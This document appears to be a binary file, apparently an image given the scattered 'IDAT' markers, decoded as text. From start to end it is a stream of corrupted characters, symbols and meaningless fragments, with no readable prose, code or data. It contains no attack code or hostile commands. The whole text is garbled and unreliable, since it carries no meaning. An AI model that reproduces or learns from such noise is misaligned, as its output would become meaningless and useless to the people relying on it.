e܂|ktp^u-+0ğh9pbZ҃z dީAeezziNBBSYYy\ӭe͚5444:g}u]dʕlذ:+fsϟmedvϻݷht#݅|\.,T6miSQQ^gUUU\wuh֣x_2a>>l~]Jvleu|䋨٬|.>k5W) ~sCk%&=^?GEwqVmmtzEy}7(:+?Kw 7sH9Yj5ke<vc?|x ;B"|CsSz l^# 탠2|p8 CKccc(LEE[n<̙CBBlٲ8IJJbdddt={4iRRRRB?xFIjj*{aڴVmm-ׯ碋.7r~6l؀bҤI>|.S~hCff&k֬ ŗIxCW.Ξɧ~ɓ#[yP)))u\vou͛7suׅz;(=&^w^Y: =}+{~o_~{yjhWk˾si 8~~hY(**p(m]ong4ϸ+Yxff"Y慏un=K|/>ۚO?MM' 6A(>*#F`cȑ---|1뮻'|笠_ONN_~Ӝ={6FytG}Duu5SLQZZ=z4w8CYj3f.c߾}47wc0!!Ν;6ll||<])}a:ths#G i;8 g8s׿Ň~HIII̎ņ, ))) 6,bƑꢊC?nB3daɋigd93`e%{jA |{5%g ,K6]κ'g~P3o&?wŞTu{.qpo-Mf5LYڽ'_WHǷCJ4|qagAbs Ż%+p<~Եk1/<ɯ_:n&MJAna0} g|huu9ÇCl©J~~>˗/rGyy9sNHOOgر̜9^z#v==իW&Gjj*555>|qu o>dffbX(++ň#0a;v꫁{:o~|>֞G*:ΞΆ +x:;]uTG~~~ ~>LJJ Q[[iֈ>_ߣFb̘1*^wm >o 6fs3ֲ҆rǵȤ͟ʓtOy-Wyv.;ǻsi91Ì}ev&[KСMfX6/>&<}Z苁p7Uןߣpz>+yf1;inη“Q9 'T¼r/:! 
s 6rA՚6?7t+QsY0m6g>q7/(ɿZON6l 䔕 }wp!탠bX((($&&餽=0nhٺ]S"??e˖t套^]vtUM߳ղsN֭[W\v:Յx<VkĆ|RYYIGG~C1twj#uIDATI`g~r'1?HLO\ m{[| gĝqzΚOwvNQpOa]:lfGCɒX%?%ޞ#]Ag}sn #Cig/.ye?yY^} Ia/BWH D3rHCBBBiNv\.455kjkkarpu[[UUU\y!簭>ۍb Mt!CD,PhCڙ$&&F,+hmm%))Gy*ΞbX.ƍߕhǿpBYYYx^<O3uQ]]iBwu1d6ǐ^pb5)\'<Ğ8~,}cfw:7$*<i<#.~WV]c/.劢^2䩇IkѼӫef: wʯ͌YYƟ8yO>0(,, ul߾oqk_ZhKGjjjk{g_G` JG~~>?Y`eee]s:L:>KJJ gqF ٲe +V@u6m&L(ꢉZ2n OG΄|WӃbMQbpI~%#];S8hjjbÆ ,XpdMϖ_λ/0bn$ }8u8|pEu<OmGb >GO?<6 %IUUv;VZZZ<7P5 t`jXbЍzߒn_CGG6l`ĉ|{c„ kX,Mbw{n0FA8 ի?oM0 e>;߽]uMOᄲw^vŪUصkTTT`ۉgҤI1gihhQ[[j:t??.]: tlm90saٳk@QYY봴ȧ|vYRR2 ttPj֮ D{{;@E^A8gjjjGXu4MfILLámmmx^III1t]{{;^dۏno>G4iRo3Rw]9?K@cS݀3X?ijj uȧ|vp8hjjw]}6-M465taxcmmm%'''}x"󁈦뺡i+ ǟ&6l bomm뮻`޽|;ߡロlVZEqq1_hnn@Av>կ=wE̝sa}X釬\or7> Jc̘1etI?sv8_]Yw޽-ijj"55eD` 0pHJJ.pvkZpD o@a0a/B0X=)z ‰b ;6䣏T8n/€bL AD;&K羻s`^8zޖN4e >ح *p0W{98[Tw!qAN=B頻|e >c-K46{d AA`{].Z}h }7 p#&uu-A! Ȟ '>44ԆkA8 *#UToYB7/p #{ }5E@tTbwDkoo4 A8 =oi CVd hZgwe ] ο  `0 Gw}A(>7[hA8Q Lt/p #{SV&p A3Xݷ)@}m}20!ο  `0 ? mA8%#y\5qANadOa0ÿ ywvwK`@/Y|srOgC\n 0'=HJ2`hQX-X-KNzȿΛd=Ha\Qb{X}-WKȞ6nH‘ g]|1 ȿHyQ҄.[[ 8^U  Ue; ]2FG3[0 C};\G a]20cc#عs'`;㭴~0|mڱ?͇a,^0h-oIWWAd0 GҁQAs!`~oKKS:n<o)B/W翡~FƎKnnnGu)<0kyVAݖWՏGᑇ~lMy 3yG|;'&^A8 #{MCjZ6 !}o-_ ԑO[Wߖ-[ؿ?- s5#>Juo9y&10;n*p޻Un-rq@⤭)BB2dBÏvC[:\ !Rz @&)3 pHzM0L7_c˶,˺kK!_$[W[޶<~lo׷PNEUf[#B6qc, R9 ֘!G ̘Ͼd7 |nA}fy1uX,P>%c6j(_tsۂn(qX8sP9g1Uci]/i9yV(f|)WEE%|G_䞀.|$a_ {KEeJpAEnESׂ!UP*yWٵk]v3fn}vn7UUUZ*.fPUe~x|Ƶz(~3%g^Mstz=!B>Hq-%ߠ ̼_h>_5xO}ouSQU 5|c/M6 nRx{-G~ßZ 5sڵcmzC;;PQ(ya?6'o^E~,J)jSQ]5$!nCq ]]]lAſիWSTTg)DzW?iSoOx[|,Vix}+5p{ zH@WμEKYlk>iy5:0kS N~5'S XؽqN݅!&߁MxkXqbܖz?)؏]KYv-|F^^9GBEeJ^ɏ-[ (}~a1W]/J˓ O% y7 # fիWSRR23ƑPC\VqmTe@_@ *ghdmD;X5N?G;|eAc_;?_BF([?΄YMx`.|u<xcG܀AYvGnSz>ֱws>?j P_蒾8O% yZN' PVV7LYY8 S^Cttٱw5r|hD+]5,XPgdҴ)fFq7`:Pa%b!B?};ܾA嚨D:|%,Va=A$)9iWMwdwիΉvь{2PeOeltZ =(c`u-JAEE%JE5wuuu(%3 (5hQ.`_I~q ({->T6ɻ6.8>p%ksleLWMG܈?|j@R5|eI%G_W-ڂ`#^lO n೜o}·jhr.CnTwuu5K.ER[[˚5k2 9qƛ'.+Tʾ{kj eoüWrͻ/>îz u& =E:S66kW._RYgL|[ͻ*_sn@'D-Z!v~7%p !FsXoY{Bm7د+_] b+=TQt7u]OEE%7W r8zϢPF r2%P?,%,zRO4HDҌw0/JE\)-# rɀ$Ih4sSݻ_^aWYz]s͇S9ֿEֹ̘ # {! l6ŵO6E3&#ۯJ.p:|G\}rSO?wmrǑ#=<]ٖfeq;w!>!i9bPSS#**c?46ut:1=3$Iʿ9*?eejj(+.@ ϤЏ]`1?a0+€vL&cAqt|dL42_CUUTr-{*:wH3GnqT r]nWQZPJnT۶M1`BD'qT6UQQ(=Wer %ߍ`"ĠA(KgF;oܷ@EE6 / :OR\Hn1U!l>I<%uvLTV2SUTT&J쩌)k:M yroGQQ燳Mcd9s[):NTJ{)=i1SU]|t˞ 9=Hz V-J &P^{TIjNiAEP`(/֯\c+h'ֳ~}އG7m[wa߹q%c6j(_tsۂn(qX8sP9g1Uci]/i9yV(f|)WEE%(ٲf리\nQ& VIU'Db* %.ng'erHddq4fWnQT&J cDyr2 k..2f̘ngnXjU]]?>YUe~x|Ƶz(~3%g^Mstz=!B>Hq-ϭӍ@)_g8a}''mྷ*iZk7)<5#O ҚqZVavұ6=_ Xe~HLI;A.J;;"lT+DGYX p\en08y|qjul"L?B GR 2yﮮ.l6۠_QQի)**2A~Vj._k96^JқneY׷\C7iǁ(t[F6Co7_3 .h7cfh_n\q9[t].bشZ1.-mgR8{Ee—jtXO#|$TT$J]^yqyI[ܶo({RJ? 
jr9cn!Jf(MD'dê'ɻ忠`ño> `6Yz5%%%0LG @=psYŕQ9?Ⱥ}9FsY+ ڈ5wj~ۏwv#0˪yy"\wx|Kbd"LմGC>6cO>bvp=1Kt3CEed^,~P>{3fǥWep[4(y~{yb &ɓӄ$ChGϦ2jn;NAo5>DG{W#=mA@!XXÂ|v^l!Mbf^x ?0]-twYş<&<~6 .wXh$$)9ѾыA$c>b1.WJDEejԅp\!+_  >2LPE~5'70'yᘮ`e]1nD\ xx9asz!j< ^hpsY?gip|̶- KR ?K/(rWDJnPr6XB!vřdUR 1OnJtyIPn ħr0aPb`8bR+(qQ.]V5kdl?A%ΜiJ#S|#\SS~/{-}Go[7υ%n}v[x߮3Q8)ҙ1 ^#,r?ŗ:u= +;.Ry-_ۆ 8IQK}]M +7BsXoY{Bm7د+_] b+=TQt7u]OEE%7(ٲ>T;(;.ʧ|\ٺE9ZFECy[NTTTrR B Vf릻VWj0U\t*w-SoȆA`)(%)ݥ|\j^%wC%mn«onfiHqOe?Ǝ;<˫(%riB!y}Urq"q5_јs#aJαw2 FܷcLAC?]1'EN:T-ÙĘXR(rLTV2ӿL^l8]&7QDeSΈD"zs_A/c%vcr"u?x'K^#V|2CH|󟧭/|* 7:ݸ9UXqQe/Ǔ N!۵ĥ%j7gK=J|<ʿ_Hrx7Ɔlh&G&zv1^ޛ45蒷t,@HeKGDS** P?G̪/vx<̞][[\(ղKP_B3~ϳ%,\aFaW=(u~zRnˏgP$D 7bBDЄªwk&}z[3E#aJDʿeΝol<9`x*m;Pe/!8r!PrID[_bȔ7-ܾwB(kgSv阸(8fbBkSIೀnhwgCQ9(ٕO?1rDk{:a3J yh;ٿC:$ Oao#KdUTTQe/DRqcGuQ"/U gnrF{o w| rI$<3[,YtphǎOe=||*l.YTI__< ZfΜ)~}_/٣M{'ׯgXYZ}{h:֯{NWEe*T^,iⴷu=vH˰8qݧ@VC \/QyMnf1"ҟת&M 55"}Q:K¿Cv}Y\.555p y4ha=ƨѬu?g:t5D (E*3BP-!aO z1jkr?[VX|rJx㛹Ke2kb6X|KlP"1݊Q 㰴qT+rbϫƤ$^tr6PB̟͂S߯J.裏`k"۵-݉TEhmu]+T-ָusbFH딌fb2{g%wSN@ ]ooog׮]\ve̘1qTUUjժ:cC22?v>@ q]?v̙3&ls V :Xٸ ez .™_w;ys=nO6p[TTaBa X ~pS-͂^^VB@iܸv-0;kef,2||$TT$J\jNB*xIKʲ*|aQu}*]$^hGb+l0y?\a결:kԐ%o\ss]]]lAſիWSToHOZ|+.lz^|h+KoeuF^s ޤm(Е3oRڰAZ|0̻ _k[_m@_4-Nh_n\q9[t].bشZ1.-mgR8{Ee—jtXO#SMEe<ES,,BnUs6ѝRKG갟eĽv}KFFlq/-ָ#@ d9zZ ~Jy"y Ml# fիWSRR2ôq1U\q{Зc;;๭4&k#l9pn?ʞaۍ\V.O[;Ys xVg&g¬e;<\C6(L7,`[,1HO;ul-444 HYp9z@.&V^I4)|b\W:'ڕF"/O+Wdʕ,]K/u]ڵk )JRPe/ę}S0)U$ݝbeSIOo3F<rC۩\oT$JьuzM\{Ki"jFdnoooMw9<v<>+L***Xf w˧ O> ̟_E%|ēfl|^}-XTPJe|*B٧Df$o3+\!~?#|;^v=8n{o&FF̙Ü9sj,] MMMI_S ,>\_WxfA_bc';˸!U^^܌LS Q='ý{TD> ]ͷ9C\"OmIg\Kje͚5[().;OIq9OR|#\SS~/{-}Go[7υ%n}v[x߮3Q8)ҙ1 ^#,ryJI| > l`49Bck#]Bۆ 8I0F>Į㦄a!B9C ,,_\~v=Xr!ݛb. (:㮧2ٴi[laӦMXy<87~hvjJn}^\j  ^!yX]'hI?JΜ9.uuyK$<|w2^f4-CYKq\.0 HDQ\Icȩ`+0]G$4W<!`:?\s31]vs9ќ;υ_c6&{ͼ=!̘L1riSQ~mbVYY9 ,\믿[oŞ={[#2=kZ0H$kJA|B{LdUgdfk#w T#7Y!GE>n&-ޏl#T#h{_Me2n5UsF).+VV<^VVFYqfx&m~S쪷wv0&,?\sXP_k${AqRQ5Gfql6p9`49x W]u|(rDQk/"GAqĉ=`/BVX:GŰ)#G޷S>M3ù^(q~N\[:q8zs?}A9}?cN8f"!n>#=˥.g}x/9 \w7-gG|SVRD"IUƀr# -?$F*+GdWɂ+_Z[[[t̙ lذ;3'OrAt<wy''NH]w݅^gBK'h-"in9ִ۫7ɸ?_>𝄯-XV|\ȼ🿥5>qy.;?-oڭlpvy.UP+w\}{矢˃<sWs?qV9oܢ)=wTzwu4xo{۾oO?GYtcr̐$i,SXRgTIM_EeQTTDeeO,7xQ㏙={6{OMzQh{Ңm,^g9(xJX2޸cS)a:\.'>&bexj0{y.dQ\*Q&fN/MdTQQQa?VMܧzMn|j[D,tO\WQ˓=%H, y6%B8,&}-ZT"ڑ1ހ0'mY\[LWE(^;w?>v.z= (17'OOExӔXzr,T%(6/zI_ iV2ζ"|W'r̿]w8<?~Q_~ItcøEiLHH>lhÇᇜf܇07%W2k***(Ѳә5OM4F"+(X !|^/%WJOنIqx'MQq'E@X=q\2sL cDWژ<\]  tzB~?m_Qm[}?{e_/χJE |=mr[k2PHFrE T8NTI_sysAάZǛ1#9l#0oh%Tn`o%ʤB Ѩ"1.Chnnfv;>,.޹F"g8]5L@3h^YeFGm=-kEXr1C>@^@r"`6FhjǙ*dY9latC,٨|Em 2c+ai̩V<@̟WII:v)Zm?_\p4zSɱ5wTAAԃ-Zmq+ij8eגk(q~Q%uTd"] ToG5?/<ͼ ZAy]ooog׮]\ve̘1qTUUjժ:cC22?v>@ q]?v̙3&ls V :Xٸ ez W)ܾkylU6p[TTaBa X ~pS-͂^^VB@iܸv-0;kef,2||$TT$Jy6NCnpi3AW@oiY$S{(:J#F?TEOQ`˓H%vv2?gFD@ҍ8nԍFJ*jXLHX58?h4yebxe39x]S[MEn[Hl"WoNVWWTUTTf**ҧ^51>K GX ROxl–ҫ/JO%V[(Ԝ mcu su a:|~ސ=· |腨]_`'x fbdvq6>m[#.@.^Ptވw=ܠ:xΓc>WfW&fd6N&V{P"ew5%֠2ҥhZjkkYfM7i3N3m<޻1e_=55Xނax+u\XaWʋW:L")y@5b+/S|)߬)@e6N<vVn#K9C ,,_\~v=Xr!ݛb. (:㮧hˆ>Z$]^nq{G˸cO::H =C[f_XҕM O^O$Endi;G9$ˑ 3.ZꪸL(.1s?T=;v =Qw6M<>\.0 HDQ\Icȩ`+jf}&%w<!`:?\s31]vFĜyݼ\E=fia׮̛sŒB$4TTTrczȤ^po<vS/))ɍKhda Or6?ș.J~mM! 
-N8yqj?U6&Y+B3,8A79Mf'/<~w`&AcZ]SLD$lc'UEEe(ia?!a?ʹS^k_EEE(1R8QfL`ql"XSUFjL 0EଋRκxާWEEE%)JŒi̿Ǜ5p*0<#zP_>M/l_?SlslsJLl;&NRLb\ >w4u[D:O%Ϋ/>(Bzָܹ-G`Х_tzZ{****IQe/&2Sqb7.OGh@ϊCcDe6 knS`vd4Lx--i۸]?3GTIR,8j!p8x9~8FqItcøEiLHvXD$ Oao#KdUTTQe/63E/N[TEMR4)<>p(nS>wƱj+y~P,MO ]|FSw$?JمۤPY>y̜9S1HX^A2M= 8?1SX56?hEHwgBJE+;l-lx7Yx&Cj՟θ$;t,_|ngrQSS 7ܐkKv޳Mn0k~ϙ]g8nʩhʌ~}DH±^z=}=nEA*3}8'VPWybu+fkeY9latC,٨|Em 2c+ai̩V<@̟WII:v)Zm?_\:ޱxY2IZ5 yPr5Lp@ o@ R36?DݯOda?ʹcn87{@ ffI鳝5 JQ{R X̞]=éyn- | Mc#UrGޕvve]ƌ3l߾MUUVʻ˿=6?'/o3=l[@]oǜ)a?j6}o Anᙍ0X_7OQW!!+'mྷ*iZk7)#O ҚqZVavұ6=_ Xe~HLI%Ŷ'Zǂ&NڹF}=_ϴ\םK>\%rqpf&*pzP ^_ϳbQw4uʿȻsP6ᮮ.l6۠_QQի)**ʳ"o=+Rs V\^Cϩ'V->t+4bޤm(Е3oRڰAZ|0̻R>7zk˸:~S XؽqN݅!&߁MxkXqbܖz?)؏]KYv-|F^^92cTTB1,;ZwBQP e]dԮή Wfnc P }Y vȗ02ɑ[L{()?]FwAu{߾}Al6zjJJ ƑPC\VqmTe@_@q>?xn+ ڈ5wj~ۏwv#0*xgp?ž]>=FF([?΄YMx`.$3}@m@u2:|8=/7>zch /Jf(Ͳ7OȬ^I-"X2l\VgJ](d3j Ezy{]%S &b! iۄRŔ>gr0%X5hSIN-V}Ӊ q7SVV6Nԣ]v]x1J`a yqC6(L7,`[,19u _[˷? ?ngk `vS6 .wXh8Hvw+I&ػO{XUDҨF|4ٖS3 ?B;}4a,jLQ#3od(m~#vߕ&(y%o3Ey'SfWQOWW'`͚5TTT=lFpzWPX,HѢ >]I~q [6>KĖ? ,*(z>XillSsz3s VFՀbBԮ/yv|31q6>m[#.@.^Pt.DJnPeol© !lE&\"ZҪ [9}.HDo_@nrdI5kQŔ1䡱1ydq G,iث /]VKmm-k֬b]J[_gRV?}-_`z y_ۯsaw_|]*/^ŷLN3ztmLm!\4O|fq@ݼGp%fn@'D-Z!v~7%p !F:n`eJG{Ē Yc|u1k:q]-ɘ+2UܼcT-sզC> g%:K5)j!xR3JKh4f*w*BQVVVE/++F3x<6C?N^x)v[KFb61 €vL&cAqt|dL42_C3Ew`UT,{d S""7rh4-4?Zo_%CSu8jˁW|4(O^9Ј-itv!^hY b}ڕO>☧0.A%m7z,X3Q/6vUʤDI8"hߞU`HIә2fANl7#C\"젔>.~Ѥw|Wii:%&WdN&3ɼ p%X"RA$LWiTI.}Qe/[I]{D"CF7rw<:*%(\%Rxbd9!=њQpg'#,Wr?XN;:()Qݘ]?8|&u ί(**** 裏 ۚb@%cѕm -B9cdλ#& 1JB2~dzlveZfbwgGTWOyI1lX=zq#763!hR Mڋehgwa9?efgm͖~KnUTTTpuEk_Zk8 %Gyz{T|g Ùo=gyL걏 DuHv }\2 VUϬ Tې:Ov13*g+jM-eΝ;imw :؁֐ޚ59Ԩ.xTTTbzchsU9ؘ؝_ڛ]pweH[2Op9DyJ͸ sY3+8ۭl=̿ 3ODBڅEyH1䡽9eR|Z-U32Ks!a"y*$FU駟pۗ$ O1?[}gI??mhh|nOf3Itf1J|]EE%%Ybtg홒FC[@s-[ \1B<6&.NFcm^fK7aɢ]ܶ 3[2Ja6ΜjTYy՘tc׋nZNJY0sUQQ%J g9Hܢ+`X#%5(QG9\UrI_<J1'^/%K.ۭ̘99dMDSq@(bJ&_ )gk= poI9yWٵk]v3fn}vn7UUUZ*.fU~;qa~;L W9{^O@PR\w l\uw=so.({-dfU\'mྷ*iZk7)O mg`,3ϙ{fr(M ͼX#X4?xSd.)1).ėl& )<&1&glź-S˳L &Yh2!`pB.~U!nCn>]]]lAſիWSTo7'OZ|+.lz^|h+KoeuF^s po6AQ ʙh)`mÇ -oFg]z)'?9 @_^6? }rvo}avw!pw`^ohŸV\lJ1}~Rz _a=Wz|},>at{LnA##4<,qHTgUD*sgF!GMIә xn/(o> `6Yz5%%ώ96:z6沊+?nr~u/r~QY?x8mǏyуDt8KJ 3j"Jjm^(4&gJE{T6(i~0I_A+abpس>i?.;]{Htv-n^g i2 0YS Of/ifA"[2WEn;NAo?(C^Cttٱw5r|hD+]5,XPg:eҴ)fFW0Iްo}jz Zhhh3X Z͂it13vw+I&ػO{XU͚wUTT2G) X¡j 7zJ#q)#n|WuZ{oަqo2i )E̵EO3,s/\6-v12d|>Ens_܃fn$M1$?Z U_HPQ yWw***Xf iϝQ^J$>& pPUr @盉sǷl0/$ps2,D멨%e #@|ӱҚ$XWD%rd[S7rri;8s4? JO"ؓA|R8 |WEQ>-mRt6% ɭ#4'i^jIθ(K.ER[[˚5k2?J+qYΤ9T!e_=55Xނax+u\XaWʋW:L")y@5b+/S|)߬f\λn_GmC$Q>Į㦄a!B9C ,,_\~v=Xr!ݛb. (:㮧d]ްe_?uSP#Q,+i~8sx:\9C Es((8G~q"H9#_?I 1+n['V].Z'\{\uUq`6Ͼ9I1qώ7BDOii4ASy"&$QvqT!hc('(r=/~_/&zeC 9z%w<!`:?\s31]vFĜyݼ\E=fia׮̛sŒ҈$Ih4멨% p"S+SNynZYVsPgA@T1s{4-]=ʵgSn ̔[M?HX9Tps34=rFB@j}1$"ZӦcwD7&z>WU2gܶfUsfX {qXosN^x)`1?eUI€̘b%'e$FǶO<.\p4RqxZqJiidl.e?g(J8='C:yY!($_nNkހȵ}z4-J99Aq@ GCPtɵ.,MܛK$o(?MЕ==TG۶M1`B̆ξ'qTUTT&%JN7ki/b¢iIۅY> T&4!(HeJ,yFW&4 . g}dܐd$p- i3 ;(bR }n! RNcձ.{`u29Q~8={y= K)J=_=z4)*gggYPvV9NRTWL̯3dw$vrg'ܗIulCpeֵeT dRTYCÒULR҄QZsd$)!r e(J"lgƫ1BsS%E+ lg y華 ߑ[d?:]Ԣľ}p̞=믿Ҵ)ƢӉ>7(}4ĠO)zw9s0gZ-K.`0HSSSהRbzcF[* -r/+VʐBrlPV 2?!+CnSC2D'+dS|.نMr3?]N` 6PoMLf5UgpP[[̙ʩY>֯Ƽ(a?﹓׳~lYh:֯ ̝ӯJ&l6Z[[ ^z<87~hvb Nh1If\XSE -^VDɗ]\.\Q,ֺ#b>k'b4y8&c|t7A"h oXV9СC477|cvg}EMM 7pC^=da=F 1x6ڋ1AGm=-kEXr1C>@ |#}pux wnkC2kb6X|KlP"1݊Q 㰴qT+rbϫƤ$^tr6PB̟͂S߯#I抁p8F;TD"I_S J9;]^eX'$I^#b-)1wc-w-|Ř*R=0#C[|x˿m{@@9^^c-BΉnhHi"T1#ccRK$ǞA*#[kڵ֨ۊng\.XjU]]{Ջ̫l\w^Wݖ u]y]wݽn#/}dI9vkA{B? 
QpN8;É'XS?Jzq$IɓD"(ƵEt:2nGǵgr n>SryF EC-9j\.ZIZ<^ºSa}M{eJ-phݶPq\o l&Eܿ{{YJsNJ?WO8}zEȝgΜ~RO9&z{w4p:Ht-v~qSJޕd']]]l6oߎիWSTی#y_WzNͦ>ŇRo[YVg<M&*#]9-e { üKYg=7 ]x%;ڗ{.+W\N`a9ow ||6mVauq[c?w.e٭֓{yꖣ"}}}:ugy?A^|Ev;%%% ~BŘfk>P(l[8ri"j\1YC6Mrlbկ>ۡmǛx`.:z**tGqWg?):ŦMxw9}4rKTv߿> kM!^y7lV]E%Z/ѣb|vtFzC ٻѼЯ~2WR:w2Yo^[Qpyd92'_"d}w_W|F}w=wm޼c.9u"[o3f('X.~r<+;DS$LW[͛&c[ӻ9I'ڌʙv|]VXiv*q:)\9$)1V} D7V^=7D^Ctt)\1.G5,X0y4mѿ!L~D/oo: OrP3z8aAyo }m\Eza=泵;pp|T JI1"IvwBoWy,($k1f駟I馛Ҿ;hJPbVb[gWqjtO3̣>w*a4RQVA5Kg$%N)Az-F: 1 }.BiYJEwC@LKD WS|,@ \$NZ y5XJt#^rIey_TWX\3Q+KK )ۅA͚'.tO[ G[o^lTVϧMmqяs(Yc.cul:F;WayףO}B{w쿶8S,盡3F?sǷ\2׏`Xby?K/(|D(q_/S\\kJ@ X|LOrT`ߠ?.U{F$,QL(7OX0!<+뾕2?D{q\bYXSBٕE 9:rN1 _'$*3d1Q yЊ\sM3=> ݹ>WfCLI$H0q0A! ÕBcYt)ZZ֬YMeF0tSʟw/K]-`GK^[0~%n Kܼ3쪷Py*]gp S3%ochFX q/u&Ŀn DKE`u?G mRh݇ص}ܔr=,Y;g踁+GK.dݶ{SZ ܓ[9A@wSgTTVMܧzMnR{EvmؒhMRi򕘇^M|ZR,ʮ TA? ^PXTLKޫF)CL=bVTV]\G S\ǩ4lDqm ҧB^>%%kͨŒYF Io5tWq)wrUWQP~3c!n\!Luܳ nwSZ GT^crɀ$ITU5$m;\>EN?(_AM ]7?ߌ=;v0Eֹ̘ `s4129w l6 &{ͼ=!̘D㊢SQQJeŒX{Sili[LYF{]@&Fk +FM%9#!Z^n$X(x f>ѧVEtFKP)+b7i?(GJ 0䅓=?xٳ3n+1'QE{ lz6fEwe?x?Sl|rÉPxTthZ>N<DIDAT $C`R*EMovG#^pFLÔز*QPGAAә.稄!IyVOL}]ɤEBCK#(Rc U+OQ>A!H7|g>2Vg-ڨGTgqb<è(E(^;w|1zS rCEEE%)JtSb8wT)eީ[^ǷX]u&HV M+c/j_ԙ#*A CĮ$Ω2a,# ٗ8LU UjDgtɫ`&L*ɽ2&gd⡵X`G٧TAvpOsqFed!$ O1?[O܏?܉(e֯$Ix:Yr%cƮ,{+)54)H'b;_؝RGAW8Z7T+xYsAAA/7╕0?$۔ + Z %q~I> |O5߻@ tGtA"_Bo&wLǛk:Z.Hr4c#/2d__< ZfΜ)~}_/ܳ~= gg~m_=s/c~UQ(7u*kz_ <ͳ2PZOZhqmJ=ܒuWLA5/,ԛ?10?DWŸǠ#-}!7cR+?Mq㉿F1©7Wr!'|Qt JgkϋI4n me ӿ˗<쳸\.jjjrmi.{Íщd:3pS{"f!(cmzzT5f{9qrybË6s͋٬b9,Y4QCdw+VF)ƙSx9?NtzMS<@ 5 3Ny***D )!YGJrohҗD43w27_oyR~7"Yn)a~Hfk dL9H!ޭXkH-++w6\IBΛFWhK%+(0 y: 't%eIg  4ʌp8xbk-Cm5CMyhw忽]vpe1c v;۷ovSUUŪUxmfYU6-NgcΔy5amྷZ uU,Xwc?q#?00"6p[TTaBa X ~pS-͂c~oSC+!bn\_tMϲW{hu3}_>zG?**S%d'$^uΨsh3rٜ<ťI?r&V[Hnca*4Ǿ!/m8^њʉ s9KfmKl[*a~H- A@ߟABˍ_`((ڒH 7VRF0r ' }Rka1a{2reR(ifW UɝawhWW6mP񯨨`̐['\sm6 />z7ʲ:# o幆mo6AQ ʙh)`mÇ -oFg]z1uY_++`аe/7V\Vs: .w1l _ÊԳM)~]ʲ[oK5:'5J>{aK(* bci~ X9j"6>н آۖu\$3:Qx+"&0$W޼#Y]O CPL$4MTorye S?)~s%l$H0[䜐4s9~ԆB '㶲eW$}cF[}L7MfwAЮѾ}lfՔLq1U\q{Зc;sJCk6"``yfeu޸\Y3BkrOǖ"LմGby0ytX/xl=,;)>mǏyу8"2UPeop(CW`#6ϥ'GÉI4Yr1:;Zw41ҰtHkuϣergw.2,VHynXXc .cNPM+h:OR\ho]Foc*6%,X2Efu0.kX(|-?H\T`MT3]YDo6UA-V}Ӊ q7SVV6A^Cttٱw5r|hD+]5,XPgҴ)fFA`+?$oXtɷXh`$ n@ldZhhh0HYp9z@.f3M^I4)|b\W:'ڕZ[VE%/ȽE %V'5Г3eJZ}2j'h!$5:H ~qZV+a~(w86] T%#.h0r7>ׯ\.^y4蒛ubD=Ri h& RIeKeL#%%f t&h~(4KPWWTUTTf***Ҟ[QRm'"μ0EJ.t'-l/[( TbO͉If8+XYW ;WslZ~q' ~;;7v}]O<γ۞7p>盉sǷl0/$ps2,)z***A ټpztrgCɟQ]"ԙaT8XO QLrͪ%whDKTrt`0fW_@9,B Zi\O3$YFbS/86ZMplɼJ(x4#0YeޞzqQ.]V5kdl)Χ7Op>ݓ)Z)R ƣ_ɭ7 -T^oי(fLۘDC\|iKf |erzrSW \Uv: QubqS bd!?[/zd?A,uM1kWsOnUMqSQQ J μ68rqIc}h?LL=a<(t9Εё:IwDӡ#>t\.ق7&懈&?X;R ( =^ȹ֤-' -t|& i)7poIkp2Ҝqۚ)#'1?.l6 tP/Rk媫τbaop˅脣^ۇ}fIZ?8hc('(r=/YׯfݹDϹ䎝 Lu.|3&C;ط6&Mhc/1MCevffLx$D;;H^gԝnRfvzOgʒ.yوϐRrP[ eTfk*W:aʴǢ̙#9A,Y.*Cڮf!ܟ̻MkcGz I7/mKG/:_(BIT>/Ws /))8dc&_oϿPWTlz*0ndXP|5MOqYeehZZ2ʊ h43i3ǟbWXOdĵcՅ7a 0EǞLƂ]# (.N.Tu r/cJ #`꤬J)dOU BI3!@VXLbY 4 ZOufV $VH~0'C+&^=U6 @z6l+AHoH1rf󽞩Sf8F>[q!/en8&@ oVGòUrH'<۶MLfcpNx6+-זg|XÉ7]ol>MV&h$i}<%u 1K`ढ218GZ"xhC۲KUIyPIA<.rE귊$r{,R6I /]Ly14]I^ Ͱǿ*IITvnɐ7CPJ썢Oj&qDHuP8cch©UzfC;X|KOsb۲KcoqTZĻ]i -Dհ&DcՕ"(F*z_v4!O _LdCHH\.RN2븥#K"٦AGj˿()3PP`/w8u;Wgr(VsQN*M#Cb-zcs}|CDB1ee=K;UF(z%\¹;xHUҨtaqe^EE%b-W }{L}mًfQppQrզpzr&IۚD(!H:Rǀ*mB+!OVwXR%o" $ި )(В/LA_wӪu$9>ӬLey7k}U?H^gOR{*`0?p86RM-"Zm6Kvcx$ $@̜ǹ-?(iN'b4AtY$+sRVˮٕ>+[ 5:·'\|Eo"zX]QGY}JrOK5vFH՗\DgƬ+7@8XI-)!2lmA=iEzf7Fc!d*/n=ӫ. 
H!τBm0>Zţ%~,u0-k>OSד{~hF*eGtd:hˮ:|װכh .E-̙3g?ӧgѳx<.4x/D(8j'MW^^^?a t~^Ct#c=I)J11A=]FLt=!c@2$ұirņ$#}}}<38jkk9s;gVm~ o#Iemf~em[wak8(w83墦n!/mpct;y:3pS{"f!(y"B6qc, R9 ֘!q!;6$Ikb6X|KlP"1݊Q 㰴qT+rbϫƤ$^tr6PB̟͂S߯CF&s6Vm ptfuTgdIٮ4&1YM)T$bt{GhC+(RXȢE;ft7d#CXtHL/;ʼOz#ôye6$Iu1(9,Dma@BLbuN)4`l3py^eLVU"uX3+id!+ڵ .3f`پ};n*VZјxCW{l~h3OF?U_g\{x8".뇱3&ls V :Xٸ ez ߒG߱܉O}ouSQU 5|c/M6 nRy-G~ßZ 5sڵcmzC;;PQpLp-!H^wY10cL}>B@M,+87I4ǁ*(}14DXPP?@](KAVn{͌{~hFZ5%>Gx  YiC9uK+.%`&i5 CsBAh'rT=! H)#S0o$A0fܺaG|^ ︯_>&dMIPUGElEEW(+دJ+Xqy =fKC[Xzӭ,3Vk]{ zH@WμEKYlk>iy5,"̻R-}_?D}rvo}avw!pw`^ohŸV\lJ1}~Rz _a=WdHEe2kO.<|Sc:,w6^Çθ$vԊ^6cO>bvp=1KCEE%3` 3۲7@^G} mp4"#`m@dXadMtT\ K;"qqړU P╍gz^w'IME=AHTIc4ͷ2PZqz~ F{"Sm=m( Q|".bZ!c"( 0'?NG ǯu^g׏Tŀ@Wo T!c!ݐ OrwUt"eee|͔lУ]v]x1J`a y1Ҵ)fFW0Iް@bI]$| 